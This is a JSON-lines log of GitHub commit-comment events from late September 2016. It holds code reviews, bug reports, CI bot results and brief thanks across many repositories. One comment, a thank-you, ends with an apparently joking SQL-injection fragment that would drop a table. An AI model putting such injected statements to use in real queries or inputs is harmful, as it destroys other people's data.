{"id":"4623119121","type":"CommitCommentEvent","actor":{"login":"goktugyil"},"repo":{"name":"goktugyil/EZSwiftExtensions"},"payload":{"comment":{"id":19187732,"position":140,"line":118,"path":"Sources/NSDateExtensions.swift","commit_id":"201850843fe4486b45bb0ac715f9a3fa2eb18e95","created_at":"2016-09-27T09:52:40Z","updated_at":"2016-09-27T09:52:40Z","body":"Finally!"}},"created_at":"2016-09-27T09:52:40Z"}
{"id":"4623120719","type":"CommitCommentEvent","actor":{"login":"azabluda"},"repo":{"name":"aspnet/EntityFramework"},"payload":{"comment":{"id":19187733,"position":71,"line":74,"path":"src/EntityFramework.Core/Metadata/Internal/ClrCollectionAccessorFactory.cs","commit_id":"b786b4614789e35986e7811fccc848ec543e428d","created_at":"2016-09-27T09:52:57Z","updated_at":"2016-09-27T09:52:57Z","body":"Why is it no longer possible to use `ICollectionTypeFactory` from DI container? What for do we still have it registered there? Thanks"}},"created_at":"2016-09-27T09:52:57Z"}
{"id":"4623122117","type":"CommitCommentEvent","actor":{"login":"prigaux"},"repo":{"name":"UnivParis1/annuaire"},"payload":{"comment":{"id":19187734,"position":61,"line":85,"path":"app/personCtrl.ts","commit_id":"77dbda16ea226a34c9280b0bae28ebdd9918736f","created_at":"2016-09-27T09:53:13Z","updated_at":"2016-09-27T09:53:13Z","body":"Cool, je ne savais pas que $routeParams incluait les paramètres \"search\".\r\nDonc on peut aussi remplacer :\r\n\r\n    $location.search().affiliation\r\n\r\npar\r\n\r\n    $routeParams['affiliation']\r\n\r\n"}},"created_at":"2016-09-27T09:53:13Z"}
{"id":"4623122936","type":"CommitCommentEvent","actor":{"login":"mobedu"},"repo":{"name":"faddat/orangepipc-linux"},"payload":{"comment":{"id":19187754,"position":null,"line":null,"path":null,"commit_id":"a99cde438de0c4c0cecc1d1af1a55a75b10bfdef","created_at":"2016-09-27T09:53:23Z","updated_at":"2016-09-27T09:53:23Z","body":"orangepi-lite   not use wifi\r\ndmesg info:\r\n\r\n[    0.918092] ehci-platform: probe of 1c1b000.usb failed with error -110\r\n[    0.952896] ehci-platform: probe of 1c1c000.usb failed with error -110\r\n[    0.987612] ehci-platform: probe of 1c1d000.usb failed with error -110\r\n[    1.092960] ohci-platform 1c1b400.usb: startup error -75\r\n[    1.104408] ohci-platform: probe of 1c1b400.usb failed with error -75\r\n[    1.202962] ohci-platform 1c1c400.usb: startup error -75\r\n[    1.214391] ohci-platform: probe of 1c1c400.usb failed with error -75\r\n[    1.312958] ohci-platform 1c1d400.usb: startup error -75\r\n[    1.324388] ohci-platform: probe of 1c1d400.usb failed with error -75"}},"created_at":"2016-09-27T09:53:23Z"}
{"id":"4623123424","type":"CommitCommentEvent","actor":{"login":"lptr"},"repo":{"name":"gradle/gradle"},"payload":{"comment":{"id":19187759,"position":null,"line":null,"path":null,"commit_id":"d722abdb3a914d846b59ea41a619e861d3830d0c","created_at":"2016-09-27T09:53:29Z","updated_at":"2016-09-27T09:53:29Z","body":":+1:"}},"created_at":"2016-09-27T09:53:29Z"}
{"id":"4623124793","type":"CommitCommentEvent","actor":{"login":"bistoury13"},"repo":{"name":"bistoury13/github-test"},"payload":{"comment":{"id":19187763,"position":null,"line":null,"path":null,"commit_id":"e5d687713b65e41592d6d2b3e71ae4c3ec00f121","created_at":"2016-09-27T09:53:46Z","updated_at":"2016-09-27T09:53:46Z","body":"+tskda ofw #0010"}},"created_at":"2016-09-27T09:53:46Z"}
{"id":"4623126087","type":"CommitCommentEvent","actor":{"login":"goktugyil"},"repo":{"name":"goktugyil/EZSwiftExtensions"},"payload":{"comment":{"id":19187769,"position":383,"line":315,"path":"Sources/StringExtensions.swift","commit_id":"201850843fe4486b45bb0ac715f9a3fa2eb18e95","created_at":"2016-09-27T09:54:00Z","updated_at":"2016-09-27T09:54:00Z","body":"I couldn't find the actual function but it works for me too."}},"created_at":"2016-09-27T09:54:00Z"}
{"id":"4623134698","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla-releng/OpenCloudConfig"},"payload":{"comment":{"id":19187784,"position":null,"line":null,"path":null,"commit_id":"a30170426df66749201bedac178db9eeab4ab5e6","created_at":"2016-09-27T09:55:31Z","updated_at":"2016-09-27T09:55:31Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#Dz3Oav0cTkWblp3hQIaFXw"}},"created_at":"2016-09-27T09:55:31Z"}
{"id":"4623135504","type":"CommitCommentEvent","actor":{"login":"PaylineGitHub"},"repo":{"name":"PaylineByMonext/payline-php-sdk"},"payload":{"comment":{"id":19187788,"position":6,"line":1578,"path":"src/Payline/PaylineSDK.php","commit_id":"227bccf76fdd0e549a0f5be1ad9193f69b200bd9","created_at":"2016-09-27T09:55:39Z","updated_at":"2016-09-27T09:55:39Z","body":"You're right ! Thank you for this feedback.\r\nI've commited your suggest on my local git, I'll push on GitHub for 4.48.1 release, due before October 19"}},"created_at":"2016-09-27T09:55:39Z"}
{"id":"4623139279","type":"CommitCommentEvent","actor":{"login":"mikelmaron"},"repo":{"name":"openstreetmap/openstreetmap-website"},"payload":{"comment":{"id":19187791,"position":null,"line":null,"path":null,"commit_id":"fdcd867de6574688935458f3c099beb5987a1c6e","created_at":"2016-09-27T09:56:23Z","updated_at":"2016-09-27T09:56:23Z","body":"Interesting. I don't really see how this is different from something like the OSMF holding in official capacity the Twitter account, the domain, the data license, etc. Well we're getting off topic but this is something I'd like to look into more on another thread."}},"created_at":"2016-09-27T09:56:23Z"}
{"id":"4623148773","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla-releng/OpenCloudConfig"},"payload":{"comment":{"id":19187807,"position":null,"line":null,"path":null,"commit_id":"95846d9e8cd4cdabd99b1dde1d6e55b104819b87","created_at":"2016-09-27T09:58:15Z","updated_at":"2016-09-27T09:58:15Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#Nnc2CYeDQ-GyzvheUvhagw"}},"created_at":"2016-09-27T09:58:15Z"}
{"id":"4623148959","type":"CommitCommentEvent","actor":{"login":"przeor"},"repo":{"name":"Ortee/Simple-React-DnD"},"payload":{"comment":{"id":19187808,"position":16,"line":16,"path":"src/routes/Home/components/Day.js","commit_id":"fc39481f98a350561ca17981a83c1a8a232fc515","created_at":"2016-09-27T09:58:17Z","updated_at":"2016-09-27T09:58:17Z","body":"Po co JSON.Parse? Przekombinowane."}},"created_at":"2016-09-27T09:58:17Z"}
{"id":"4623150571","type":"CommitCommentEvent","actor":{"login":"przeor"},"repo":{"name":"Ortee/Simple-React-DnD"},"payload":{"comment":{"id":19187814,"position":10,"line":10,"path":"src/routes/Home/components/Event.js","commit_id":"fc39481f98a350561ca17981a83c1a8a232fc515","created_at":"2016-09-27T09:58:36Z","updated_at":"2016-09-27T09:58:36Z","body":"to samo, JSON stringify? coś tu nei gra:)"}},"created_at":"2016-09-27T09:58:36Z"}
{"id":"4623152445","type":"CommitCommentEvent","actor":{"login":"przeor"},"repo":{"name":"Ortee/Simple-React-DnD"},"payload":{"comment":{"id":19187818,"position":19,"line":19,"path":"src/routes/Home/components/Event.js","commit_id":"fc39481f98a350561ca17981a83c1a8a232fc515","created_at":"2016-09-27T09:58:57Z","updated_at":"2016-09-27T09:58:57Z","body":"Te ify słabo wyglądają, napewno da się to zrobić lepiej"}},"created_at":"2016-09-27T09:58:57Z"}
{"id":"4623153398","type":"CommitCommentEvent","actor":{"login":"przeor"},"repo":{"name":"Ortee/Simple-React-DnD"},"payload":{"comment":{"id":19187821,"position":34,"line":34,"path":"src/routes/Home/components/EventsList.js","commit_id":"fc39481f98a350561ca17981a83c1a8a232fc515","created_at":"2016-09-27T09:59:08Z","updated_at":"2016-09-27T09:59:08Z","body":"Te ify słabo wyglądają, napewno da się to zrobić lepiej"}},"created_at":"2016-09-27T09:59:08Z"}
{"id":"4623155816","type":"CommitCommentEvent","actor":{"login":"przeor"},"repo":{"name":"Ortee/Simple-React-DnD"},"payload":{"comment":{"id":19187826,"position":55,"line":55,"path":"src/routes/Home/components/EventsList.js","commit_id":"fc39481f98a350561ca17981a83c1a8a232fc515","created_at":"2016-09-27T09:59:37Z","updated_at":"2016-09-27T09:59:37Z","body":"to jest dobre, czemu tyle zmiennych? Nie lepiej zrobić jakiś obiekt? Słabo"}},"created_at":"2016-09-27T09:59:37Z"}
{"id":"4623157605","type":"CommitCommentEvent","actor":{"login":"xfurry"},"repo":{"name":"cmangos/mangos-wotlk"},"payload":{"comment":{"id":19187832,"position":null,"line":null,"path":null,"commit_id":"21f2f0040f07879a2d6d2cb5449d389e75fac63c","created_at":"2016-09-27T09:59:58Z","updated_at":"2016-09-27T09:59:58Z","body":":+1: \r\n\r\nLooks very good and clean.\r\nCan't wait to play around with this when I have the chance. "}},"created_at":"2016-09-27T09:59:58Z"}
{"id":"4627701927","type":"CommitCommentEvent","actor":{"login":"Warpten"},"repo":{"name":"Subv/PokemonGo"},"payload":{"comment":{"id":19200000,"position":null,"line":null,"path":null,"commit_id":"8933b7dfbcd0eefb3967a18c8bae76b546bc5768","created_at":"2016-09-28T00:00:33Z","updated_at":"2016-09-28T00:00:33Z","body":"Oh come on."}},"created_at":"2016-09-28T00:00:33Z"}
{"id":"4627703663","type":"CommitCommentEvent","actor":{"login":"codingInSpace"},"repo":{"name":"codingInSpace/MonsterDiner"},"payload":{"comment":{"id":19200008,"position":null,"line":null,"path":null,"commit_id":"0330b1d6b0b164ddc2b34d573a06f8b58e286015","created_at":"2016-09-28T00:01:02Z","updated_at":"2016-09-28T00:01:02Z","body":"Thank you my dear friend and colleague! ; DROP TABLE bwiberg/repositories"}},"created_at":"2016-09-28T00:01:02Z"}
{"id":"4627706442","type":"CommitCommentEvent","actor":{"login":"claudioandre"},"repo":{"name":"magnumripper/JohnTheRipper"},"payload":{"comment":{"id":19200022,"position":null,"line":null,"path":null,"commit_id":"7b47e453b4207fd758a2e2d2f5c642c15a8f32a6","created_at":"2016-09-28T00:01:49Z","updated_at":"2016-09-28T00:01:49Z","body":"> I think this is a great idea, but not 100% sure what to expect or how to proceed.\r\n\r\nIt is a wonderful idea. \r\n\r\n> it may be that CircleCI has to be used for this.\r\n\r\nI had a nice experience with Travis (In fact, I prefer Travis over CircleCI). I can't remember if I saw any good stack trace when one was needed, but I'm sure Travis UI pleased me a lot of times. \r\n"}},"created_at":"2016-09-28T00:01:49Z"}
{"id":"4627708840","type":"CommitCommentEvent","actor":{"login":"fenix008"},"repo":{"name":"RPCS3/rpcs3"},"payload":{"comment":{"id":19200028,"position":null,"line":null,"path":null,"commit_id":"4f74cbe5103b83cb88a9d03433bd312a7ce4c27a","created_at":"2016-09-28T00:02:31Z","updated_at":"2016-09-28T00:02:31Z","body":"Okay...after this commit Virtua Fighter 5:FS doesn't work anymore (in dojo mode: after character selecting I can't choose arena stage; in arcade mode: after char. selection just infinite loading)"}},"created_at":"2016-09-28T00:02:31Z"}
{"id":"4627710204","type":"CommitCommentEvent","actor":{"login":"Ordenkrieger"},"repo":{"name":"SarthakNarang/android_device_oneplus_onyx"},"payload":{"comment":{"id":19200032,"position":null,"line":null,"path":null,"commit_id":"4e8fbcfbc10ed357220d6ea3b4a9df6d843f6c4c","created_at":"2016-09-28T00:02:54Z","updated_at":"2016-09-28T00:02:54Z","body":"Hey to fix video recording just use this repo: https://github.com/Ordenkrieger/android_frameworks_av\r\nand add this \"media.stagefright.codecremote=false\" to the build.prob. That will fix it."}},"created_at":"2016-09-28T00:02:54Z"}
{"id":"4627711916","type":"CommitCommentEvent","actor":{"login":"Ctucker9233"},"repo":{"name":"magento/magento2"},"payload":{"comment":{"id":19200036,"position":null,"line":null,"path":null,"commit_id":"488bfdfff7c51824d9a4a2c1061019b3b35b2d72","created_at":"2016-09-28T00:03:26Z","updated_at":"2016-09-28T00:03:26Z","body":"@omiroshnichenko I'm trying to implement this fix as well. I went to the parent commit and I cannot figure out where to place the lines of changed code as the line numbers do not match. I tried searching my file to find where the original code was used and I couldn't find that either. Any help would be appreciated."}},"created_at":"2016-09-28T00:03:26Z"}
{"id":"4627724801","type":"CommitCommentEvent","actor":{"login":"jeffwidman-ns"},"repo":{"name":"dan-blanchard/dd-agent"},"payload":{"comment":{"id":19200072,"position":42,"line":69,"path":"checks.d/kafka_consumer.py","commit_id":"634310740321285d9f95ea7d02e73764502c9745","created_at":"2016-09-28T00:07:30Z","updated_at":"2016-09-28T00:07:30Z","body":"This throws:\r\n    UnboundLocalError: local variable 'consumer_groups' referenced before assignment\r\n\r\nI fixed by changing to `if not 'consumer_groups'  in instance:` although I'd probably prefer to collapse the check together with the check in line 49 so it's only defined in one place."}},"created_at":"2016-09-28T00:07:30Z"}
{"id":"4627733772","type":"CommitCommentEvent","actor":{"login":"greatruofan"},"repo":{"name":"jbhatt-salesforce/Warden-Service"},"payload":{"comment":{"id":19200090,"position":null,"line":null,"path":null,"commit_id":"9735b4efb252a7d0b1c06a2f10a0675931e8c491","created_at":"2016-09-28T00:10:24Z","updated_at":"2016-09-28T00:10:24Z","body":"@saaja-sfdc @aertoria , I don't think this commit pass the test, metricReader need to be modified, can you look into it?"}},"created_at":"2016-09-28T00:10:24Z"}
{"id":"4627734714","type":"CommitCommentEvent","actor":{"login":"greatruofan"},"repo":{"name":"jbhatt-salesforce/Warden-Service"},"payload":{"comment":{"id":19200092,"position":null,"line":null,"path":null,"commit_id":"9735b4efb252a7d0b1c06a2f10a0675931e8c491","created_at":"2016-09-28T00:10:42Z","updated_at":"2016-09-28T00:10:42Z","body":"just out of curiosity, where is the MetricReader in this repo?"}},"created_at":"2016-09-28T00:10:42Z"}
{"id":"4627740145","type":"CommitCommentEvent","actor":{"login":"jvaidya1"},"repo":{"name":"rachaellew1991/mstu5003"},"payload":{"comment":{"id":19200099,"position":3,"line":3,"path":"test.md","commit_id":"a24922a9db0a812ffe935d1c8ed8dffb308f97cb","created_at":"2016-09-28T00:12:19Z","updated_at":"2016-09-28T00:12:19Z","body":"@rachaellew1991 what do you think of these changes? will you accept them?"}},"created_at":"2016-09-28T00:12:19Z"}
{"id":"4627744510","type":"CommitCommentEvent","actor":{"login":"jvaidya1"},"repo":{"name":"Sebastianopazo/mstu5013"},"payload":{"comment":{"id":19200110,"position":5,"line":5,"path":"Feci analyst/index.html","commit_id":"e8b5dd22e9bb0f17b5699864c6e5929483d85156","created_at":"2016-09-28T00:13:45Z","updated_at":"2016-09-28T00:13:45Z","body":"@Sebastianopazo i added the change"}},"created_at":"2016-09-28T00:13:45Z"}
{"id":"4627754604","type":"CommitCommentEvent","actor":{"login":"jfoug"},"repo":{"name":"magnumripper/JohnTheRipper"},"payload":{"comment":{"id":19200139,"position":null,"line":null,"path":null,"commit_id":"7b47e453b4207fd758a2e2d2f5c642c15a8f32a6","created_at":"2016-09-28T00:17:00Z","updated_at":"2016-09-28T00:17:00Z","body":"Could you look at what would be needed in our .travis.yml file to get things working.  I gave it a stab with knowledge I had from my 14_02 ubuntu (my fedora works fine).  I do not asan under ubuntu.  I did get things working, but ubuntu never gave me the wonlderful stack traces that I get on fedora (there was a script to help, but the Fedora does it by default).\r\n\r\nI like Travis better also, BUT there have been things we are forced to do in Circle, and this one might be one of those instances.\r\n\r\nBut if you have an idea, please proceed.  What I have done has not worked."}},"created_at":"2016-09-28T00:17:00Z"}
{"id":"4627755161","type":"CommitCommentEvent","actor":{"login":"plaxdan"},"repo":{"name":"DigitalWorkshopCenter/js1-buckskinfilly"},"payload":{"comment":{"id":19200140,"position":null,"line":null,"path":null,"commit_id":"4f9ab7a7e99ba114880808c3c145162ed4e416a1","created_at":"2016-09-28T00:17:11Z","updated_at":"2016-09-28T00:17:11Z","body":"This is great! Good job student!"}},"created_at":"2016-09-28T00:17:11Z"}
{"id":"4627762345","type":"CommitCommentEvent","actor":{"login":"kflorence"},"repo":{"name":"github/hubot-scripts"},"payload":{"comment":{"id":19200160,"position":null,"line":null,"path":null,"commit_id":"91b33a64d2be811edc6430f2377eb42b4e8037c5","created_at":"2016-09-28T00:19:30Z","updated_at":"2016-09-28T00:19:30Z","body":"Closing the loop https://www.quora.com/GitHub-What-is-the-significance-of-the-Ship-It-squirrel"}},"created_at":"2016-09-28T00:19:30Z"}
{"id":"4627782056","type":"CommitCommentEvent","actor":{"login":"danielbair"},"repo":{"name":"Progi1984/PHPPresentation"},"payload":{"comment":{"id":19200204,"position":null,"line":null,"path":null,"commit_id":"436f8f76bd3f4b6fe0d70e7354340ea2508ee433","created_at":"2016-09-28T00:25:38Z","updated_at":"2016-09-28T00:25:38Z","body":"Would this work for MP3 files?"}},"created_at":"2016-09-28T00:25:38Z"}
{"id":"4627784763","type":"CommitCommentEvent","actor":{"login":"greatruofan"},"repo":{"name":"jbhatt-salesforce/Warden-Service"},"payload":{"comment":{"id":19200217,"position":null,"line":null,"path":null,"commit_id":"9735b4efb252a7d0b1c06a2f10a0675931e8c491","created_at":"2016-09-28T00:26:31Z","updated_at":"2016-09-28T00:26:31Z","body":"no bother, I found it, unfortunately, consecutive test doesn't pass on my local "}},"created_at":"2016-09-28T00:26:31Z"}
{"id":"4627784849","type":"CommitCommentEvent","actor":{"login":"mdoleh"},"repo":{"name":"mdoleh/MoodMonsters"},"payload":{"comment":{"id":19200218,"position":null,"line":null,"path":null,"commit_id":"44b0447a83d3758d1facc3bd82a8ca0ea390aaa7","created_at":"2016-09-28T00:26:32Z","updated_at":"2016-09-28T00:26:32Z","body":"ref #26 "}},"created_at":"2016-09-28T00:26:32Z"}
{"id":"4627785162","type":"CommitCommentEvent","actor":{"login":"mdoleh"},"repo":{"name":"mdoleh/MoodMonsters"},"payload":{"comment":{"id":19200219,"position":null,"line":null,"path":null,"commit_id":"f4a80f3c703923a6d6a0bde7a35ba68c1c8ea135","created_at":"2016-09-28T00:26:39Z","updated_at":"2016-09-28T00:26:39Z","body":"ref #26 "}},"created_at":"2016-09-28T00:26:39Z"}
{"id":"4627785431","type":"CommitCommentEvent","actor":{"login":"cosimoc"},"repo":{"name":"endlessm/eos-desktop"},"payload":{"comment":{"id":19200221,"position":51,"line":774,"path":"js/ui/windowManager.js","commit_id":"a41f7d46e3516cd4fb4c7bd36579371aac19e605","created_at":"2016-09-28T00:26:45Z","updated_at":"2016-09-28T00:26:45Z","body":"I don't think it does -- I'd expect the interpreter to be smart enough not to recreate the object every time. But even if it did, I very much doubt that this is anything that would show in a profiler, even on incredibly slow hardware."}},"created_at":"2016-09-28T00:26:45Z"}
{"id":"4627785895","type":"CommitCommentEvent","actor":{"login":"tista500"},"repo":{"name":"tista500/Adapta"},"payload":{"comment":{"id":19200224,"position":null,"line":null,"path":null,"commit_id":"16a8c04419f73872b0cc567ff7c0c609ee25f3d5","created_at":"2016-09-28T00:26:54Z","updated_at":"2016-09-28T00:26:54Z","body":"@albertsmuktupavels,\r\n\r\nI've already fixed and integrated 3.22.0 without any changes in upstream. So I don't think I needed to file the issue to upstream...\r\n\r\nRegards."}},"created_at":"2016-09-28T00:26:54Z"}
{"id":"4627793647","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19200254,"position":null,"line":null,"path":null,"commit_id":"51154c98f536e3a98d10ebc8d1118cfb7af0fec3","created_at":"2016-09-28T00:29:27Z","updated_at":"2016-09-28T00:29:27Z","body":"develop (macumber) - x86_64-MacOS-10.10-clang: OK (2385 of 2448 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-51154c98f536e3a98d10ebc8d1118cfb7af0fec3-x86_64-MacOS-10.10-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-51154c98f536e3a98d10ebc8d1118cfb7af0fec3-x86_64-MacOS-10.10-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-97.43%25-yellow.svg)</a> \n"}},"created_at":"2016-09-28T00:29:27Z"}
{"id":"4627797671","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19200264,"position":null,"line":null,"path":null,"commit_id":"0ee7e83a4657c5d823a6b17dff6c8032d38a3366","created_at":"2016-09-28T00:30:42Z","updated_at":"2016-09-28T00:30:42Z","body":"EMS (brianlball) - x86_64-Linux-Ubuntu-14.04-clang-3.5: OK (2288 of 2497 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-0ee7e83a4657c5d823a6b17dff6c8032d38a3366-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-0ee7e83a4657c5d823a6b17dff6c8032d38a3366-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-91.63%25-yellow.svg)</a> \n"}},"created_at":"2016-09-28T00:30:42Z"}
{"id":"4627798401","type":"CommitCommentEvent","actor":{"login":"chriscoding-com"},"repo":{"name":"chriscoding-com/Java"},"payload":{"comment":{"id":19200266,"position":null,"line":null,"path":null,"commit_id":"0d4036ac964a685ecd59c83f80334106627351ca","created_at":"2016-09-28T00:30:56Z","updated_at":"2016-09-28T00:30:56Z","body":"Still some neating up to do"}},"created_at":"2016-09-28T00:30:56Z"}
{"id":"4627810750","type":"CommitCommentEvent","actor":{"login":"coorg"},"repo":{"name":"ekeeke/Genesis-Plus-GX"},"payload":{"comment":{"id":19200293,"position":null,"line":null,"path":null,"commit_id":"8b909e40350ffe7a85176912c60f869221f57510","created_at":"2016-09-28T00:35:05Z","updated_at":"2016-09-28T00:35:05Z","body":"Thanks for trying that. I just tried a totally fresh rebind manually and I still have the problem. You aren't using the mayflash megadrive controller are you?\r\n\r\nMeanwhile I'll try a complete fresh rebuild...."}},"created_at":"2016-09-28T00:35:05Z"}
{"id":"4627813756","type":"CommitCommentEvent","actor":{"login":"wangxiaoerzuishuai"},"repo":{"name":"wangxiaoerzuishuai/wangxiaoerzuishuai.github.io"},"payload":{"comment":{"id":19200297,"position":null,"line":null,"path":null,"commit_id":"ef126cf1610564ac0da574d7f0d4f8536dd7df3f","created_at":"2016-09-28T00:36:02Z","updated_at":"2016-09-28T00:36:02Z","body":"finish"}},"created_at":"2016-09-28T00:36:02Z"}
{"id":"4627814977","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19200300,"position":null,"line":null,"path":null,"commit_id":"0ee7e83a4657c5d823a6b17dff6c8032d38a3366","created_at":"2016-09-28T00:36:25Z","updated_at":"2016-09-28T00:36:25Z","body":"EMS (brianlball) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-0ee7e83a4657c5d823a6b17dff6c8032d38a3366-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a>  \n"}},"created_at":"2016-09-28T00:36:25Z"}
{"id":"4627815522","type":"CommitCommentEvent","actor":{"login":"aertoria"},"repo":{"name":"jbhatt-salesforce/Warden-Service"},"payload":{"comment":{"id":19200303,"position":null,"line":null,"path":null,"commit_id":"9735b4efb252a7d0b1c06a2f10a0675931e8c491","created_at":"2016-09-28T00:36:37Z","updated_at":"2016-09-28T00:36:37Z","body":"@greatruofan \r\nWould you please paste your error message?"}},"created_at":"2016-09-28T00:36:37Z"}
{"id":"4627815674","type":"CommitCommentEvent","actor":{"login":"pefoley2"},"repo":{"name":"tjcsl/ion"},"payload":{"comment":{"id":19200305,"position":null,"line":null,"path":null,"commit_id":"5b2e1f1a74093782af047a3eebe6f67be94ac2b1","created_at":"2016-09-28T00:36:41Z","updated_at":"2016-09-28T00:36:41Z","body":"Please use the built-in filtering functionality"}},"created_at":"2016-09-28T00:36:41Z"}
{"id":"4627815991","type":"CommitCommentEvent","actor":{"login":"dktapps"},"repo":{"name":"iTXTech/Phoenix"},"payload":{"comment":{"id":19200308,"position":null,"line":null,"path":null,"commit_id":"677492d6a02b9ceac901bbd5ea54e38af0f86f9a","created_at":"2016-09-28T00:36:48Z","updated_at":"2016-09-28T00:36:48Z","body":"testing integration, ignore this comment"}},"created_at":"2016-09-28T00:36:48Z"}
{"id":"4627817351","type":"CommitCommentEvent","actor":{"login":"wangxiaoerzuishuai"},"repo":{"name":"wangxiaoerzuishuai/wangxiaoerzuishuai.github.io"},"payload":{"comment":{"id":19200312,"position":1,"line":1,"path":"CNAME","commit_id":"61e3b68df5d021e205d708c09c46159d74258135","created_at":"2016-09-28T00:37:17Z","updated_at":"2016-09-28T00:37:17Z","body":"finish"}},"created_at":"2016-09-28T00:37:17Z"}
{"id":"4627825388","type":"CommitCommentEvent","actor":{"login":"bernardobrezende"},"repo":{"name":"matheusaugsschmitz/crescer-2016-2"},"payload":{"comment":{"id":19200336,"position":11,"line":11,"path":"modulo-01/Elfo.java","commit_id":"11648358cd33d30960c786320066854f72365b5d","created_at":"2016-09-28T00:40:06Z","updated_at":"2016-09-28T00:40:06Z","body":"Nesse caso é o mesmo que fazer\r\n\r\n```Java\r\nif (flechas == 0) {\r\n  flechas = 42;\r\n}\r\n```\r\n\r\nA adição é desnecessária."}},"created_at":"2016-09-28T00:40:06Z"}
{"id":"4627826656","type":"CommitCommentEvent","actor":{"login":"bernardobrezende"},"repo":{"name":"matheusaugsschmitz/crescer-2016-2"},"payload":{"comment":{"id":19200339,"position":16,"line":16,"path":"modulo-01/Elfo.java","commit_id":"11648358cd33d30960c786320066854f72365b5d","created_at":"2016-09-28T00:40:30Z","updated_at":"2016-09-28T00:40:30Z","body":"Essa atribuição é desnecessária, o Java por padrão atribui o valor 0 ao tipo `int`."}},"created_at":"2016-09-28T00:40:30Z"}
{"id":"4627829030","type":"CommitCommentEvent","actor":{"login":"bernardobrezende"},"repo":{"name":"matheusaugsschmitz/crescer-2016-2"},"payload":{"comment":{"id":19200345,"position":19,"line":19,"path":"modulo-01/Elfo.java","commit_id":"11648358cd33d30960c786320066854f72365b5d","created_at":"2016-09-28T00:41:17Z","updated_at":"2016-09-28T00:41:17Z","body":"Lembre-se que este método refactory era só para o exercício da refatoração, não devemos deixá-lo funcionando com este parâmetro. Não faz sentido.\r\n\r\nMude isto."}},"created_at":"2016-09-28T00:41:17Z"}
{"id":"4627830191","type":"CommitCommentEvent","actor":{"login":"bernardobrezende"},"repo":{"name":"matheusaugsschmitz/crescer-2016-2"},"payload":{"comment":{"id":19200348,"position":26,"line":26,"path":"modulo-01/Elfo.java","commit_id":"11648358cd33d30960c786320066854f72365b5d","created_at":"2016-09-28T00:41:40Z","updated_at":"2016-09-28T00:41:40Z","body":"Pq esse método foi criado? Cliente não solicitou isto."}},"created_at":"2016-09-28T00:41:40Z"}
{"id":"4627831991","type":"CommitCommentEvent","actor":{"login":"Armok628"},"repo":{"name":"Armok628/rogue-test"},"payload":{"comment":{"id":19200355,"position":null,"line":null,"path":null,"commit_id":"c907c49c6ae10a5f3200db4b25143cafff065640","created_at":"2016-09-28T00:42:20Z","updated_at":"2016-09-28T00:42:20Z","body":"Also, house() re-replaces dungeon(), as dungeon() has a large chance of causing a pseudo-infinite loop given numbers higher than 3. Until I figure out a good way to solve this problem, or intend to implement dungeon(), I'm going to leave it alone."}},"created_at":"2016-09-28T00:42:20Z"}
{"id":"4627836254","type":"CommitCommentEvent","actor":{"login":"BlackSwanBay"},"repo":{"name":"turbo/alwsl"},"payload":{"comment":{"id":19200367,"position":null,"line":null,"path":null,"commit_id":"7139e1186bb8cf463060fed0ca0b4e268d4a13cb","created_at":"2016-09-28T00:43:49Z","updated_at":"2016-09-28T00:43:49Z","body":"wow, really a great work! so far i have installed version alwsl 0.5 on Windows 10 x64 build 14931.1000 and every fonctions worked so far... Snapshot create; yaourt; ect \r\nI really be exciting about the next update :) Keep your great work and thanks"}},"created_at":"2016-09-28T00:43:49Z"}
{"id":"4627837570","type":"CommitCommentEvent","actor":{"login":"kofelo123"},"repo":{"name":"kofelo123/smartitcording"},"payload":{"comment":{"id":19200373,"position":null,"line":null,"path":null,"commit_id":"71797ac265dc5e3066237b7afb44814256c780e5","created_at":"2016-09-28T00:44:15Z","updated_at":"2016-09-28T00:44:15Z","body":"readme 지워진것 다시추가, db백업sql파일 추가"}},"created_at":"2016-09-28T00:44:15Z"}
{"id":"4627838846","type":"CommitCommentEvent","actor":{"login":"sypherce"},"repo":{"name":"sypherce/ds2key"},"payload":{"comment":{"id":19200383,"position":null,"line":null,"path":null,"commit_id":"11e279bfa9a07f65e222fb6161ae82816d24cf7f","created_at":"2016-09-28T00:44:39Z","updated_at":"2016-09-28T00:44:39Z","body":"Involves issue #31"}},"created_at":"2016-09-28T00:44:39Z"}
{"id":"4627839068","type":"CommitCommentEvent","actor":{"login":"sypherce"},"repo":{"name":"sypherce/ds2key"},"payload":{"comment":{"id":19200385,"position":null,"line":null,"path":null,"commit_id":"3cd5e3b0843da8b687dcccbfda3759e770c43b03","created_at":"2016-09-28T00:44:43Z","updated_at":"2016-09-28T00:44:43Z","body":"Involves issue #31"}},"created_at":"2016-09-28T00:44:43Z"}
